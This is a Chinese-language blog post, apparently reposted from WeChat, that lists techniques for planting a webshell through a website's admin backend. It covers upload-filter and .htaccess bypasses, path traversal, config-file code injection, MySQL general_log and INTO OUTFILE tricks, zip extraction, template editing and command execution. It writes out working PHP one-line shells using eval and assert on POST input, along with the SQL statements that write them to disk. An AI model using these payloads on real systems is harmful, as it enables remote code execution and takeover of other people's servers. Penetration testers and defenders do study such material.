后台getshell常用技巧总结
2023-3-16 00:4:56 Author: 橘猫学安全(查看原文) 阅读量:18 收藏

1.利用文件上传漏洞,找文件上传处想办法上传php文件。

一些网站在设置可以允许修改上传的文件类型则直接添加php

有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过

很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况

这种情况直接上传一个.hatccess文件覆盖这个,让其失效。

或者上传不重命名的话上传../../shell.php 传到其他不被限制访问的目录

或者找任意文件删除漏洞把.hatccess文件删除

2.找文件配置的地方写入php代码,一般都有过滤的,想办法绕过

过滤单引号的话可以用注释把上一个的内容注释掉 在下一个参数配置注入代码

效果如下

$conf_1 ='xx\';$conf_2 = ';phpinfo();//'

这样就相当于

$conf_1 ='xx\';$conf_2 = ';phpinfo();

php代码就可以执行了,防护比较弱的话直接访问这个配置文件就可以getshell了。

防护比较好禁止访问配置文件时,就找包含这个配置文件的文件即可。

3.找有没有存在任意文件包含的地方,本地包含的话直接上传php代码的图片,远程包含的话就在自己的服务器上设置php代码文件 

4.sql注入getshell 要知道网站的绝对路径

方法一:利用设置mysql log为php文件,并设置路径到网站目录下,这样就可以把sql中执行的php语句插入的log中了

如:

SETglobal general_log='on';SETglobalgeneral_log_file='D:/webshell/WWW/shell.php';#如果没有shell.php

会自动创建

SELECT'<?php assert($_POST["cmd"]);?>';

方法二:

select "<?php phpinfo(); ?>" into outfile 'shell路径.php'

5.远程图片文件下载

有时候远程图片下载的时候,可以设置一下下载自己的php文件

如 自己服务器上的文件1.php

<?phpecho "<?php phpinfo(); ?>";?>

或者别的方式,让页面有php代码,如果不过滤后缀的话直接会下载这个php文件

6.zip解压getshell

这个再系统升级或者插件安装的地方很多都有这个问题。上传shell.php在压缩包中,上传系统升级时会解压缩,那么就可以getshell

7.缓存写入

有些地方会把缓存写入到一个php文件里,想办法让自己的payload写入缓存中

8.数据库备份getshell

有些提供功能可以通过数据库备份进行修改文件后缀。

9.编辑模板getshell

在网站编辑模板插入一句话

10.命令执行拿webshell

echo <?php @eval($_POST(a));?> >路径.php

可以用相对路径也可以用绝对路径

11.编辑器漏洞getshell

要留意cms使用的编辑器版本是否是已知漏洞的版本

12.利用文件解析漏洞拿webshell

13.找可以执行代码的函数,看看参数是否可控

14.找写文件的函数,看看文件后缀和内容是否可控

15.没有进入后台

0day拿webshell

IIS写权限拿webshell(put一个shell进去)

命令执行拿webshell

通过注入漏洞拿webshell

前台图片上传拿webshell

Strusts2拿webshell

java反序列拿shell

作者:黑面狐来源:https://blog.csdn.net/qq1124794084/article/details/89001203

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247506041&idx=2&sn=b552498bc4c5a51d9300073e582d10ab&chksm=c04d5f47f73ad651cf4ae61aef642dfdd85e482b47e851f31780974c45cce7e694a0a03c8a46#rd
如有侵权请联系:admin#unsafe.sh